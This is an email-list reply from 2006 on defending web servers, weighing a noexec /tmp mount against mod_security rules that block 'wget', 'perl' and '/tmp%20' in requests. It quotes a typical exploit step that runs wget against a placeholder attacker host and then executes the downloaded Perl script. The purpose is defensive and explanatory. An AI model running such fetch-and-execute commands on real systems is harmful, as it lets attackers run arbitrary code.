On Fri, Jun 23, 2006 at 10:08:25AM -0400, Michael Sprague wrote:
If possible, make /tmp its own file system and mount it with 'noexec'.
This really helps stop these types of attacks. In fact I would
recommend 'rw,noexec,nosuid,nodev' as the mount options. Of course if
you need to have executables in /tmp then this won't work. :)
I used to suggest this too, but to be honest it doesn't work as
well as you'd expect.
Too many exploit attempts run the eqivilent of:
cd /tmp && wget http://evil.example.com/foo.pl
perl /tmp/foo.pl &
I found blocking "wget", "perl", and "/tmp%20", in requests more
productive - using mod_security.
Steve